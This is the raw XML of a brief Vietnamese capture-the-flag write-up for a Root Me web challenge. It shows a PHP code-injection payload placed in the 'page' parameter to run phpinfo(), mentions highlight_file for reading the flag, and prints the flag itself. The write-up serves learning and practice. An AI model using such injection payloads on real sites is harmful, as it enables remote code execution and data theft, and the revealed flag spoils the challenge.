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E75F" w14:textId="0D961BCB" w:rsidR="003E679F" w:rsidRDefault="003E679F">
      <w:r>
        <w:t>Đầu tiên vào trang thì ta thấy trang không có filter</w:t>
      </w:r>
      <w:r w:rsidR="00213782">
        <w:t xml:space="preserve"> ta sẽ thử thêm nháy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4B9CB" w14:textId="46BE4D43" w:rsidR="00C54FA4" w:rsidRDefault="003E679F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEF9126" wp14:editId="7BAB72BA">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="679929913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29913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FEFC" w14:textId="5DE093F2" w:rsidR="00213782" w:rsidRDefault="00213782">
      <w:r>
        <w:t>Tiếp theo ta sẽ thử chèn payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7557AFB7" w14:textId="6FF2AD09" w:rsidR="00213782" w:rsidRDefault="00213782">
      <w:r w:rsidRPr="00213782">
        <w:t>http://challenge01.root-me.org/web-serveur/ch47/?page=%27.phpinfo().%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4EC50" w14:textId="51D2BA7F" w:rsidR="00213782" w:rsidRDefault="00213782">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C49734E" wp14:editId="768E017A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="155541771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17712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2CA" w14:textId="1AA725FA" w:rsidR="000A0964" w:rsidRDefault="000A0964">
      <w:r>
        <w:t>Sử dụng highlight file để xem flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B4D450" w14:textId="6748A76B" w:rsidR="00C3639B" w:rsidRDefault="00C3639B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694B9D25" wp14:editId="7434884B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="22888151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81515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5ED7" w14:textId="336D285B" w:rsidR="00C3639B" w:rsidRDefault="00C3639B">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>x4Ss3rT1nglSn0ts4f3A7A1Lx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E96680" w14:textId="77777777" w:rsidR="00C3639B" w:rsidRDefault="00C3639B"/>
    <w:sectPr w:rsidR="00C3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A4"/>
    <w:rsid w:val="000A0964"/>
    <w:rsid w:val="00213782"/>
    <w:rsid w:val="003E679F"/>
    <w:rsid w:val="007826A4"/>
    <w:rsid w:val="00C3639B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5622"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18080738-DAA8-4808-BDC3-0CD37980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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T17:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T17:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>